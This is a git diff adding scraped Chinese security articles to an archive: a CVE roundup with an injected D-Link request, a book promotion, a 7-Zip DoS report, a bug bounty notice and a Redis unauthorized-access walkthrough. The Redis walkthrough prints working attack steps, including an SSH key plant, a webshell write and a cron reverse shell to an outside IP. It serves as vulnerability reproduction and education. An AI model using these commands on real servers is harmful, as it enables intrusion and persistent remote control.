diff --git a/data.json b/data.json index 63c511b0..35414ec8 100644 --- a/data.json +++ b/data.json @@ -510,5 +510,26 @@ "https://mp.weixin.qq.com/s?__biz=MzkwNjY1NjI2Mg==&mid=2247487351&idx=1&sn=8e73398873f8ff68deb9f1569edbc0ba": "漏洞挖掘-小白编写人生中第一个漏洞利用脚本", "https://mp.weixin.qq.com/s?__biz=MzIzMzE2OTQyNA==&mid=2648958230&idx=1&sn=437f3c5bb26667570286aa98bf84e96f": "静水深流 | 第2届BUGPWN TSCM黑盒挑战赛 • 顺利闭幕", "https://mp.weixin.qq.com/s?__biz=MzA4NzU1Mjk4Mw==&mid=2247492091&idx=1&sn=5f68436b2b04ad659f177f8cc67ddb87": "某FE平台一键漏洞综合利用工具", - "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488519&idx=1&sn=9089dcb5fc0277a2d59afdaa0b75e81c": "【0Day】《黄药师》药业管理软件SetMedia_Picture_info存在SQL注入漏洞导致RCE" + "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488519&idx=1&sn=9089dcb5fc0277a2d59afdaa0b75e81c": "【0Day】《黄药师》药业管理软件SetMedia_Picture_info存在SQL注入漏洞导致RCE", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066203&idx=3&sn=98b7c0046c725ff8299a89a706c8ee43&chksm=f36e7ddbc419f4cdfd1a5b1325eeaa6a76fad3e86c3a04d39a3c93255a412bb3e8ee77745d9d&scene=58&subscene=0": "【安全圈】苹果解决了两个被积极利用的零日漏洞", + "https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649787467&idx=1&sn=a415a569eadfb841c7db9ab18a3b9dee": "致命漏洞与暴露API:财富1000强企业面临的30000个暴露API和10万漏洞挑战", + "https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652503214&idx=1&sn=419458f95fb9a47435385dd26d072abf": "雷神众测漏洞周报2024.11.18-2024.11.24", + "https://mp.weixin.qq.com/s?__biz=MzkyMTY1NDc2OA==&mid=2247487197&idx=1&sn=7d93cc6c308fb83bd7d7013fa924e5b6": "【SQL注入】用友NC process SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=Mzg2ODg3NzExNw==&mid=2247488369&idx=1&sn=6cd730f5c98d9fdf6cdb6a9073c0370e": "API攻防 | Web API 安全漏洞挖掘指南!", + "https://mp.weixin.qq.com/s?__biz=Mzk0NTY5Nzc1OA==&mid=2247484135&idx=1&sn=cbb43d16d8b8a261b1b7a85fc0ebdcc8": "一文读懂CSRF漏洞", + "https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133534&idx=1&sn=4d8595e4bea300bb4866eb3150c9415e": "违反《网络安全法》相关规定,快手被依法处罚;警惕基于已知漏洞的链式攻击,超2000台Palo Alto防火墙或被攻陷 | 牛览", + "https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247524518&idx=3&sn=2fd0a6c6bfc0e72a2a2a26b4c44bc48c": "CVE-2024-11612 7z 24.07 中的无限循环拒绝服务漏洞", + "https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247545415&idx=1&sn=3263c9c7028760229121597d480ea8de": "某大学图书管理系统刷积分逻辑漏洞", + "https://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247614256&idx=1&sn=08a44a39bc09b3418b09f2b8d5b58ce4": "研究217篇子域接管漏洞报告后的总结", + "https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247492807&idx=2&sn=3512827d10788f7e4f010e0049490225": "超过2000台Palo Alto Networks防火墙遭到黑客攻击,攻击者利用了最近才修补的零日漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkyOTcwOTMwMQ==&mid=2247484559&idx=1&sn=cd577a9a506f9849a954661ecb56bb8b": "科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞", + "https://mp.weixin.qq.com/s?__biz=MzI5MjY4MTMyMQ==&mid=2247487937&idx=1&sn=163591ce7da4e37e1e72bd1e0038cdf9": "破解命令注入漏洞:详解原理、绕过技巧与防护策略", + "https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486128&idx=1&sn=ac548c4ae7d280103751b6bf9942e20b": "「漏洞复现」万能门店小程序管理系统 doPageGetFormList SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzI2NzI2OTExNA==&mid=2247517446&idx=1&sn=18ecc069c3990680cc3255f3b5a23c23": "MiSRC 年末漏洞冲刺活动来啦~", + "https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489358&idx=1&sn=7231e758676223aad81806ee8dcf9166": "海信智能公交企业管理系统 OrgInfoMng.aspx SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzIyNzc3OTMzNw==&mid=2247485585&idx=1&sn=f41a6231836188c432550043679f719a": "文件解析常见漏洞总结", + "https://mp.weixin.qq.com/s?__biz=Mzg2Mzg1MTA5MQ==&mid=2247484499&idx=1&sn=a28feef48d1c9886d8ddce271345ab85": "Redis未授权主从复制RCE复现", + "https://mp.weixin.qq.com/s?__biz=Mzg2NTk4MTE1MQ==&mid=2247486155&idx=1&sn=1b1603ee917c845b68ffba4b8eb781ab": "2024年wordpress、d-link等相关的多个cve漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491521&idx=1&sn=368be5edbb0ac65b9c3b5406ab701311": "漏洞预警 | 九思OA任意文件读取漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491521&idx=3&sn=24b3cda574e362b3dbbc7af3c9b155ae": "漏洞预警 | 点企来客服系统硬编码未授权漏洞" } \ No newline at end of file diff --git a/doc/2024年wordpress、d-link等相关的多个cve漏洞.md b/doc/2024年wordpress、d-link等相关的多个cve漏洞.md new file mode 100644 index 00000000..9bb80e9b --- /dev/null +++ b/doc/2024年wordpress、d-link等相关的多个cve漏洞.md @@ -0,0 +1,59 @@ +# 2024年wordpress、d-link等相关的多个cve漏洞 +棉花糖糖糖 TtTeam 2024-11-25 00:50 + +⚠️漏洞 + + +一、CVE-2024-10914 + +- D-Link DNS-320、DNS-320LW、DNS-325 及 DNS-340L 中的漏洞,版本截至 20241028。 + +- 利用方式:GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1。 + +二、CVE-2024-11305 + +- Altenergy Power Control Software 关键漏洞,版本截至 20241108。 + +- 利用方式: + +- POST /index.php/display/status_zigbee HTTP/1.1等一系列请求头信息。 + +三、CVE-2024-10793 + +- WP Security Audit Log 插件的 XSS 漏洞。 + +- 利用方式:curl -X POST...。 + +四、CVE-2024-11199 + +- 插件 rescue_progressbar 的存储 XSS 攻击。 + +- 利用方式:[rescue_progressbar...]。 + +五、CVE-2024-11381 + +- 插件 ch_registro 的存储 XSS 攻击。 + +- 利用方式:[ch_registro...]。 + +六、CVE-2024-43919 + +- YARPP <= 5.30.10 缺少授权漏洞,可未经授权修改展示类型。 + +- 利用方式:GET /...。 + +七、CVE-2024-52433 + +- My Geo Posts Free <= 1.2 的未经认证 PHP 对象注入漏洞。 + +- 利用方式:GET / HTTP/2...。 + +八、CVE-2024-9935 + +- Elementor 页面构建器 PDF 生成插件 <= 1.7.5 的未经认证任意文件下载漏洞。 + +- 利用方式:GET /...。 + +免责声明:仅供教育目的,未经许可使用这些漏洞非法,作者不承担后果。 + + diff --git a/doc/API攻防 | Web API 安全漏洞挖掘指南!.md b/doc/API攻防 | Web API 安全漏洞挖掘指南!.md new file mode 100644 index 00000000..281eba10 --- /dev/null +++ b/doc/API攻防 | Web API 安全漏洞挖掘指南!.md @@ -0,0 +1,220 @@ +# API攻防 | Web API 安全漏洞挖掘指南! +匿名白帽子 WK安全 2024-11-25 06:40 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/iaibvmyz4605MByZllCCS0cmlgjyicaNO08olzw2c1P2zTTjC8qPnWax9lfGcNDTrmKWqRxhqfpWttct0DhiaqzuGA/640?wx_fmt=gif "") + +关注我们丨文末赠书 + +知名网络安全公司HackerOne发布的**《2023年黑客力量安全报告》**透露,已有30名优秀的白帽子各自获得了超100万美元的奖励,而其中最厉害的白帽奖励超过了400万美元。 + +HackerOne是全球领先的漏洞赏金平台,自2012年成立以来,HackerOne已向白帽子和漏洞研究人员发放了超过3亿美元的奖励。 + +白帽遵循一套道德准则和职业操守, +**在获得组织的明确授权后,通过模拟黑客攻击的方式来测试网络、系统或应用程序的安全性,发现潜在的安全漏洞,并提交漏洞报告。****** + +成为一名白帽黑客,不仅能帮助组织打造更安全的网络和系统环境,还能获得相当不菲的收入,**你是不是也动心了?也想成为漏洞赏金猎人?** + +当前有一个好机会,就是去发掘API +(Application Programming Interface,应用程序编程接口) +漏洞。据统计,API调用在网络流量中占比超过80%,但是API漏洞相对隐蔽,不易发现,一旦被黑客利用,则会造成巨大的损失。 + +**《API攻防:Web API安全指南》****这本书就体系化地讲解了Web API 的漏洞挖掘方法和防御策略,****不仅能够帮助组织构建起API安全体系,还能指导安全技术人员成长为一名漏洞赏金猎人。** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibh02YfuLEGTh5bEbqTAvicJs9Lfm62njMaNtG2F9Y2GwCr0CE0yBu9a0w/640?wx_fmt=jpeg&from=appmsg "") + +▼ +点击下方,即可购书 + + +我们先来了解API漏洞的本质,探讨其难以防范的原因。 + +Part.1 + + +**为什么API漏洞难以防范?** + +API是一组预定义的函数、协议和工具,用于构建软件应用程序。 + +在互联网应用中,它允许不同的软件系统之间交互和共享数据,**API就是应用之间的“沟通桥梁”。** + +通过API,开发者可以访问一个服务或应用程序的功能,而无须了解其底层代码。 + +**例如,社交媒体平台提供的API允许第三方应用访问用户数据,或者执行特定操作,如发布消息或获取好友列表。** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhVicFJDU6AYrhFW66RzAqKR1eN5AC7hsUq9EySKIG3AQxMOFt94knCoA/640?wx_fmt=jpeg "") + +**但如果设计不当或者欠缺有效管理,则 API 的实现或配置中就会存在安全缺陷,这就是 API 漏洞。** + +攻击者会利用这些漏洞来获取未授权的数据访问权限、执行恶意操作或破坏系统。 + +**API 漏洞可能存在以下多种形式:** + +**1.认证和授权缺陷**:攻击者可能会冒充合法用户访问敏感数据或执行操作。 + +**2.输入验证不足:**无法正确处理恶意输入,导致注入攻击,如SQL注入、命令注入或跨站脚本攻击(XSS)。 + +**3.数据泄露:**配置不当可能导致敏感数据暴露。 + +**4.不安全的传输:**通信没有使用加密协议(如HTTPS),数据在传输过程中可能被窃听或篡改。 + +API 漏洞相对于系统漏洞更加难以防范,因为其风险潜藏在业务逻辑之中,而非操作系统底层的缺陷,**所以一般的漏洞扫描工具与 Web 应用渗透测试方法对它作用不大。** + +这就意味着, +**攻击者不需要采取复杂的网络穿透策略,也不用规避尖端防病毒软件的监测,只要发送正常的HTTP请求,就可以实现API攻击。** + +**因此,传统的Web安全方法并不适用于API安全,需要有新的思路来解决问题。** + +**《API 攻防:Web API安全指南》****采用对抗性思维来充分利用各类API的功能与特性,从黑客的视角进行被动和主动的API侦察,找到暴露的API,再以模糊测试等多种方法来发现漏洞。** + +**本书作者科里·鲍尔(Corey Ball)在信息技术和网络安全领域有着超过 10 年的丰富经验,** +他涉足多个行业,包括航空航天、农业、能源、金融科技、政府服务以及医疗保健等。目前他是 Moss Adams 的网络安全咨询经理,也是渗透测试服务部门的负责人。 + +**本书的译者团队也同样强大,皇智远** +( +陈殷)**是呼和浩特市公安局网络安全专家,中国电子劳动学会专家委员会成员。** +他长期从事网络安全领域的研究和打击网络犯罪的工作,曾负责国内外多个千万级安全项目。 + +**孔韬循** +(K0r4dji) +**拥有十余年网络安全行业从业经验,**是破晓团队 +(Pox Team) +创始人,Defcon Group 86024 发起人,HackingGroup 网安图书专委会秘书长,《Web 代码安全漏洞深度剖析》作者。目前担任安恒信息数字人才创研院北区运营总监,广州大学方滨兴院士预备班专家委员会委员。 + +**在作者、技术审稿人、译者团队的共同加持下,本书内容极具含金量。下面我们就来跟随大咖们的脚步,通过四步学会 API 安全的攻防之道。** +**** + + +Part.2 + + +**四步打造API安全护城河** + +本书主要关注的是 Web 应用程序中广泛使用的 REST API 的安全性,同时也会涉及攻击 GraphQL API。 + +本书给读者安排了一条循序渐进的学习路线,先学会运用 API 所需的工具和技术,然后学习探测潜在的漏洞,以及如何利用这些漏洞,最后则是采取措施修复漏洞。 + +**本书将学习过程规划为四步,分别是掌握基础知识、搭建测试环境、API渗透测试详解、真实案例剖析。** + +各步之间为递进关系,初学者宜拾级而上,逐渐深入去学习。 + +**01掌握基础知识** + +本书先从 API 安全测试的预备知识入手,详细介绍了 Web 应用程序的工作原理、REST 和 GraphQL API 的基本概念,以及常见的API漏洞。 + +读者将学习如何进行威胁建模、测试 API 认证、审计 API 文档等关键技能,打好 Web API 安全测试的理论基础。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibh0pC9C49QwOgOFWOkNw55GicS7sC4lBDxGic5VLkdYyfO2DffWiaQyia6Jg/640?wx_fmt=png "") + + + +**02搭建测试环境** + +这一步指导读者如何搭建自己的API测试实验室。介绍了一些必备的安全分析工具,如Burp Suite和Postman,并详细说明了如何使用这些工具进行API安全测试。 + +读者将学习如何创建一个易受攻击的API实验室,为实践攻击技巧提供必要的环境。 + +通过实验1和实验2,读者可以亲手实践在 REST API 中枚举用户账户和查找易受攻击的 API。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhZnK9mhzNPeQY2s2IGV5Cbw8a0NMwoq9Vsr6SdHPIcL7vopsyzwLSPw/640?wx_fmt=png "") + +使用Postman拦截的请求 + + +**03API渗透测试详解** + +**第三步是本书重点内容,深入探讨了攻击 API 的方法论,包括侦察、端点分析、攻击身份验证、模糊测试、利用授权漏洞、批量分配和注入等技术。** + +读者还将学习通过开源情报技术发现 API,分析它们以了解其攻击面。学完这一步,读者将掌握逆向工程 API、绕过身份验证,以及对安全问题进行模糊测试等方法。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhXcO5LeR3iaq2BQjg1Kuia1UeR5ibUQDicDTHRaSysPHUPa9hjW0t6HRmUg/640?wx_fmt=png "") + +使用Postman成功进行 NoSQL 注入攻击 + +每一章都配有实验部分,使读者能够通过实践来加深理解。通过这些章节,读者将掌握如何发现和利用 API 漏洞,以及提高 API 的安全性的方法。 + + +**04真实案例剖析** + +此步通过分析真实的 API 攻防案例,让读者了解 API 漏洞在数据泄露和漏洞赏金中的利用情况。 + +**这部分内容不仅包括了应用规避技术和速率限制测试,还涵盖了针对 GraphQL API 的攻击示例,以及如何在现实世界中运用这些技术。** + +通过这些案例,读者可以获得宝贵的实战经验,了解黑客如何利用 API 漏洞,并学会如何防范这些攻击。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhUGe0WZmOkxfhbKZiaaDkSRoO8KXXI8WRqCEOiaa8TyhkuZHHom4ibIbVw/640?wx_fmt=png "") + +对主机变量进行攻击的结果 + +至此,读者就可以全面掌握 Web API 的攻击与防御策略,解决实际工作中的 API 安全问题。 + + +Part.3 + + +**结语** + + +‍API 安全对于企业组织来说至关重要,而组织也必须在快速发展业务与构建安全体系的工作上做到平衡。 + +**《API 攻防:Web API 安全指南》****深入介绍了 Web API 的安全策略,并以翔实的实践案例给网络安全专业人士提供了行动指导。** + +**本书一大特点是内容系统全面**,从 Web API 的基础知识入手,逐步深入搭建测试环境、渗透测试方法,以及真实世界的 API 攻击案例,为读者提供了一条完整的学习路径。 + +**书中不仅涉及理论,还涵盖了实践操作,确保读者能够全面理解 Web API 安全的各个方面。** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhOe1ibOFLJHNYZicXJIDW82aIQMyzKC0zqZ70uqst5wePbyu9Loy6IO8g/640?wx_fmt=png "") + +精彩书摘 + +**另一大特点是实战性强,** +书中提供了大量设计精良的实验,能够让读者动手实践并体会,从而加深对 API 安全测试的理解。**通过亲自操作,读者可以更好地掌握书中介绍的工具和技术。** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhgg0JtBmTe9J4oicKrt80GDtl66z9boLJsf6lIZrTu7mfSDoEDicaGsBg/640?wx_fmt=png "") + +精彩书摘 + +**本书通过分析真实的 API 攻防案例,让读者了解 API 漏洞在现实世界中是如何被利用的,从而做到防范这些攻击。** + +**这些丰富的案例提供了宝贵的实践经验,帮助读者在实际工作中应对安全挑战。** +**** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibhAia7Th5Sq71tNzxzH22AKutqq6nQDV2S7DBOSdUDsMQMZOqO8QmXcqQ/640?wx_fmt=png "") + +精彩书摘 + +**书末附有 API 黑客攻击检查清单,为读者提供了一个实用的工具,** +帮助他们在实际工作中快速识别和评估潜在的安全风险。 + +**本书适合网络安全初学者、渗透测试人员、安全工程师、开发人员以及对 Web API 安全感兴趣的专业人士阅读学习。** +无论是需要基础知识的新手,还是寻求高级技巧的资深专家,都能从本书中获得有价值的信息。**** + +学透**《API 攻防:Web API 安全指南》**,不仅能更好地为组织建设安全的网络环境,还可以帮助我们成为一名杰出的漏洞赏金猎人! + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/iaibvmyz4605OGsWGYlUqFQy9CvTQ8oCibh02YfuLEGTh5bEbqTAvicJs9Lfm62njMaNtG2F9Y2GwCr0CE0yBu9a0w/640?wx_fmt=jpeg&from=appmsg "") + +▼ +点击下方,即可购书 + + +‍ + +‍ + +**—END—**![](https://mmbiz.qpic.cn/mmbiz_png/iaibvmyz4605N10XIaxgEPfZ976dQDN0boRA5V3uPM0m0Nf4RmhwvDJyia9Ayuj1qR2jLmZZibhu0LRMN5d9BMocEw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +**分享你对这本书的看法** + + +在留言区参与互动,并点击在看和转发活动到朋友圈,我们将选1名读者赠送e读版电子书1本,截止时间11月30日。 + + + +‍ + +‍ + +‍ + +‍ + diff --git a/doc/CVE-2024-11612 7z 24.07 中的无限循环拒绝服务漏洞.md b/doc/CVE-2024-11612 7z 24.07 中的无限循环拒绝服务漏洞.md new file mode 100644 index 00000000..ebb660f6 --- /dev/null +++ b/doc/CVE-2024-11612 7z 24.07 中的无限循环拒绝服务漏洞.md @@ -0,0 +1,45 @@ +# CVE-2024-11612 7z 24.07 中的无限循环拒绝服务漏洞 + Ots安全 2024-11-25 06:06 + +![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "") + +去年夏天,我决定研究一下 7zip 的模糊测试。我收集了一批有趣的存档文件,其中包含所有 7z 支持的格式,并开始使用 AFL++ 进行模糊测试。 + +运行几天后,模糊器发现了一个有趣的输入。该输入一旦打开,将使 7zip 无限期地“解压缩”。问题在于函数对用户输入的检查不当,导致无限循环。 + +考虑到 7zip 是众多基础设施后端使用的关键软件,我决定向 Zero Day Initiative 报告该漏洞。 + +几个月后,该漏洞终于被披露:CVE-2024-11612 – 7-Zip CopyCoder 无限循环拒绝服务漏洞。 + +此漏洞允许远程攻击者在受影响的 7-Zip 安装上创建拒绝服务条件。需要与此库交互才能利用此漏洞,但攻击媒介可能因实现而异。特定缺陷存在于流处理中。该问题源于可能导致无限循环的逻辑错误。攻击者可以利用此漏洞在系统上创建拒绝服务条件。 + +以下是触发该漏洞的文件: + +https://bushido-sec.com/wp-content/uploads/2024/11/id_000076sig_06src_000991000979time_645883execs_109584op_splicerep_7.7z + +**参考:** + +https://www.zerodayinitiative.com/advisories/ZDI-24-1606/ + +https://www.7-zip.org/ + + + +感谢您抽出 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "") + +来阅读本文 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "") + +**点它,分享点赞在看都在这里** + diff --git a/doc/MiSRC 年末漏洞冲刺活动来啦~.md b/doc/MiSRC 年末漏洞冲刺活动来啦~.md new file mode 100644 index 00000000..ce99bdf6 --- /dev/null +++ b/doc/MiSRC 年末漏洞冲刺活动来啦~.md @@ -0,0 +1,142 @@ +# MiSRC 年末漏洞冲刺活动来啦~ +小米安全中心 小米安全中心 2024-11-25 02:24 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/zabS4D3Aq5857noTdGAVuzufUQoJarwg6ibrq3ku8kUGEd3IEhoHKfEsMEp930AUcTHZ3L4ib1BxWrt1FaopxADQ/640?wx_fmt=jpeg&from=appmsg "") + +**MiSRC年末冲刺活动来啦 ~** + + +活动期间 +**多重奖励来袭**,阅读下文了解详细规则吧 + +文末还有  +**MiSRC 2024白帽颁奖典礼**预告哦~ + + +**01** + +**参与活动** + +**1** + +**活动时间** + +✦ + + +**11月25日-12月12日** + +**2** + +**参与方式** + +✦ + + +提交漏洞时在漏洞名称前注明**【年末冲刺】**, +**若无则视为不参加本次活动** + + + +**02** + +**活动规则** + +**1** + +**漏洞翻倍奖励** + +✦ + + +◆ 有效严重高危漏洞: +**2倍贡献币奖励** + +◆ 有效中危漏洞: +**1.5倍贡献币奖励** + +**2** + +**个人冲榜奖励** + +✦ + + +个人贡献值排名前三可获得额外奖励: + +**TOP1**  可获得   +**588贡献币** + +**TOP2**  可获得   +**388贡献币** + +**TOP3**  可获得   +**188贡献币** + +⚠️活动期间, +**个人贡献值≥200且排名前三**可获得个人冲榜奖励 + +**3** + +**团队冲榜奖励** + +✦ + + +团队贡献值排名前三可获得额外奖励: + +**TOP1团队**  可获得   +**388 贡献币** + +**TOP2团队**  可获得 + **288 贡献币** + +**TOP3团队**  可获得   +**188 贡献币** + +⚠️活动期间, +**团队贡献值≥1000且至少有2位成员提交中危以上有效漏洞**可获得团队冲榜奖励,团队奖励统一发放给队长,由队长自行分配 + +**4** + +**附加冲榜奖励** + +✦ + + +◆ 活动期间,前三位(以提交时间为准)提交高危及以上有效漏洞的白帽师傅,可获得额外奖励: +**88 贡献币** + +◆ 活动期间,贡献值最高的师傅将 +**被邀请到线下颁奖典礼(包机酒)** + + + +**03** + +**转发抽奖** + +转发本文至朋友圈,抽取三名同学送出小米口袋保温杯,文章需要保留到开奖日期哦~ + +![](https://mmbiz.qpic.cn/mmbiz_jpg/zabS4D3Aq5857noTdGAVuzufUQoJarwgOt6SWiaR5avzykW1ib0376PIT5H2ysdm8y6QGGCKwkl03B3P8CQedFnA/640?wx_fmt=jpeg&from=appmsg "") + + + + + +**MiSRC 年度颁奖典礼预告** + + +2024年即将接近尾声,感谢这一年陪伴MiSRC的小伙伴们 + +MiSRC将于十二月底在北京举办年度白帽颁奖典礼 + +届时期待与白帽师傅们欢聚一堂,共度狂欢夜~ + +⚠️ 2024年度榜单统计截止时间为**12月12日** + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/zabS4D3Aq5857noTdGAVuzufUQoJarwgFIgePuCfJT1DdjumLNTgChAJca23kozrOAE0tIl3x0OI1z1dRwiaunA/640?wx_fmt=jpeg&from=appmsg "") + + + diff --git a/doc/Redis未授权主从复制RCE复现.md b/doc/Redis未授权主从复制RCE复现.md new file mode 100644 index 00000000..ccf45bf2 --- /dev/null +++ b/doc/Redis未授权主从复制RCE复现.md @@ -0,0 +1,122 @@ +# Redis未授权主从复制RCE复现 +原创 kiand 网安知识库 2024-11-25 02:00 + +### 漏洞描述 + +Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 + +Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 +### 利用条件 +1. 没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。 + +1. 没有设置密码认证(一般为空),可以免密码远程登录redis服务。 + +### 漏洞复现 +#### 写入文件 + +原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生一个授权的key。 + +写webshell也是同理,将一句话木马写入redis,再将缓冲数据文件保存到web目录下 + +默认缓冲数据存放地址 +``` +101.43.138.109:8080> config get dir +1) "dir" +2) "/data" +101.43.138.109:8080> config get dbfilename +1) "dbfilename" +2) "dump.rdb" + +``` + +准备好公钥文件![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PIC99OHF58GicNMS9ZQsb41J3ic8AMUOE6OxC1S12Nw980via1TV23vjKQ/640?wx_fmt=png&from=appmsg "") + + +再把a.txt文件内容写入redis缓冲 +``` +cat a.txt | redis-cli -h 101.43.138.109 -p 8080 -x set key +注:-x 代表从标准输入读取数据作为该命令的最后一个参数。 + +``` + +更改rdb文件存储位置 +``` +101.43.138.109:8080> config set dir /root/.ssh +OK +101.43.138.109:8080> config set dbfilename authorized.keys +OK +101.43.138.109:8080> save +OK + +``` + +查看authorized.keys文件,公钥已被写入。 + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PdTY4xrd4FbOmRDlRkVE386yAPQEbQvnEj9RJNHx5recPHumIjy20wQ/640?wx_fmt=png&from=appmsg "") +写webshell +``` +set webshell "\n\n\n\\n\n\n" +save + +``` + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PicRcruSjOsd7Cv9fdwBia55bF63Oa7ic8AyGG2G5TpWnrF3xHjx7mESFw/640?wx_fmt=png&from=appmsg "") +还可以写计划任务反弹shell +``` +set crontab "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/3.113.126.249/1234 0>&1\n\n" +config set dir /var/spool/cron +config set dbfilename root +save + +``` +> +> redis 可以创建文件但无法创建目录,所以, redis 待写入文件所在的目录必须事先存在。 + + +这种利用方式需要redis有写文件的权限,遇到下面这种情况就无法利用了。 + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5P8Z6Mia8JAZn11dibseblMGQh9N1GTl9DrgVoRBE0tzJK8PJWyMngrWVA/640?wx_fmt=png&from=appmsg "") + +#### 主从复制RCE + +主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave),数据的复制是单向的,只能由主节点到从节点。通过数据复制,Redis 的一个 master 可以挂载多个 slave,而 slave 下还可以挂载多个 slave,形成多层嵌套结构。所有写操作都在 master 实例中进行,master 执行完毕后,将写指令分发给挂在自己下面的 slave 节点。slave 节点下如果有嵌套的 slave,会将收到的写指令进一步分发给挂在自己下面的 slave + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PsvqdqkOrTEy08mU444BZOBOH1yqQMvunQLQsmDCaSF71HibBZD0BsWQ/640?wx_fmt=png&from=appmsg "") + + +开启主从复制的方式 +``` +配置文件:在从服务器的配置文件中加入:slaveof +启动命令:redis-server启动命令后加入 --slaveof +客户端命令:Redis服务器启动后,直接通过客户端执行命令:slaveof ,则该Redis实例成为从节点。 + +``` + +Redis提供**主从模式:**使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。 + +在Reids 4.x之后,Redis新增了**模块功能**,通过外部拓展,可以实现在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。 +> +> 很像mysql的UDF提权 + + +在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过**FULLRESYNC**同步文件到从机上。然后在从机上加载so文件,我们就可以执行拓展的新命令了。 + 